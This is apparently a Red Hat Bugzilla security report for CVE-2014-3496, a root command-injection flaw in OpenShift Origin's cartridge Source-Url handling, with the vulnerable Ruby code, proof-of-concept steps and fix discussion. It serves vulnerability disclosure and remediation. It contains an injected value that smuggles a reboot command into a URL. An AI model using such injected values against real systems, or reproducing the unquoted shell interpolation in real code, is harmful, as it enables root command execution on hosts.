Bug 1110470 (CVE-2014-3496)

Summary: CVE-2014-3496 OpenShift Origin: Command execution as root via downloadable cartridge source-url
Product: [Other] Security Response Reporter: Kurt Seifried <kseifried>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: urgent Docs Contact:
Priority: urgent    
Version: unspecifiedCC: anli, bleanhar, ccoleman, dmcphers, jdetiber, jechoi, jhonce, jialiu, jkeck, jokerman, jrusnack, kseifried, lmeyer, mmccomas, mmcgrath, security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2014-06-18 20:53:41 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1110283, 1110472, 1110473, 1110474, 1110507    
Bug Blocks: 1110862    

Description Kurt Seifried 2014-06-17 18:36:30 UTC 
Jeremy Choi of Red Hat reports:

OpenShift Origin does not properly validated 'Source-Url' of cartridge manifest files to create applications and so commands injected like below in it will be executed in the node. 

  Source-Url: http://name-app.example.com/test/test;reboot;.tar.gz 

Attacks can also succeed when the source-URL ends with .zip, .tgz and .tar. The file specified in Source-Url must be available from the URL for the successful attack.

In cartridge_repository.rb:

498           temporary = PathUtils.join(File.dirname(target), File.basename(cartridge.source_url))
(deleted for brevity)
519             when uri.scheme =~ /^https*/ && cartridge.source_url =~ /(\.tar\.gz|\.tgz)$/
520               begin
521                 uri_copy(URI(cartridge.source_url), temporary, cartridge.source_md5)
522                 extract(:tgz, temporary, target)
523               ensure
524                 FileUtils.rm(temporary)
525               end
(deleted for brevity)
617       def self.extract(method, source, target)
618         case method
622           when :tgz
623             Utils.oo_spawn("/bin/tar -C #{target} -zxpf #{source}",
624                            expected_exitstatus: 0)


The system command execution in line 623 will run #{source} which is comprised of cartridge.source_url. While the source url is validated in manifest.rb, still ';' can be injected.

370         if @manifest.has_key?('Source-Url')
371           raise InvalidElementError.new('Source-Url') unless @manifest['Source-Url'] =~ URI::ABS_URI
372           @source_url = @manifest['Source-Url']


The PoC below has been shown in Online devenv_4873

1. Create a devenv.
2. Place a malformed manifest file with Source-Url modified in a host the devenv can access. 
  
  Source-Url: http://<host>/test;reboot;.tar.gz 

3. Create "test;reboot;.tar.gz" at the path of Source-Url in the host.
4. Try to create a cartridge with the malformed manifest.
    $ rhc app create app1 http://<host>/manifest.yml --no-git

The devenv will reboot.
Comment 2 Mike McGrath 2014-06-17 18:47:02 UTC 
While fixing this, lets stop doing this download as root.
Comment 3 Kurt Seifried 2014-06-17 19:30:16 UTC 
This has now leaked publicly: https://github.com/openshift/origin-server/pull/5521
Comment 4 Clayton Coleman 2014-06-17 19:41:16 UTC 
A single quoted argument around the source URL argument should also have been sufficient to prevent this (' and " are escaped in valid URLs)
Comment 5 Kurt Seifried 2014-06-17 23:38:39 UTC 
Upgraded to critical due to authentication requirements, although auth is required a common use case is to give out free testing accounts or other easily created accounts.
Comment 6 Martin Prpič 2014-06-18 07:57:49 UTC 
Acknowledgements:

This issue was discovered by Jeremy Choi of the Red Hat HSS Pen-test Team.
Comment 7 errata-xmlrpc 2014-06-18 19:41:32 UTC 
This issue has been addressed in following products:

  RHEL 6 Version of OpenShift Enterprise 1.2

Via RHSA-2014:0762 https://rhn.redhat.com/errata/RHSA-2014-0762.html
Comment 8 errata-xmlrpc 2014-06-18 20:00:28 UTC 
This issue has been addressed in following products:

  RHEL 6 Version of OpenShift Enterprise 2.1

Via RHSA-2014:0764 https://rhn.redhat.com/errata/RHSA-2014-0764.html
Comment 9 errata-xmlrpc 2014-06-18 20:00:41 UTC 
This issue has been addressed in following products:

  RHEL 6 Version of OpenShift Enterprise 2.0

Via RHSA-2014:0763 https://rhn.redhat.com/errata/RHSA-2014-0763.html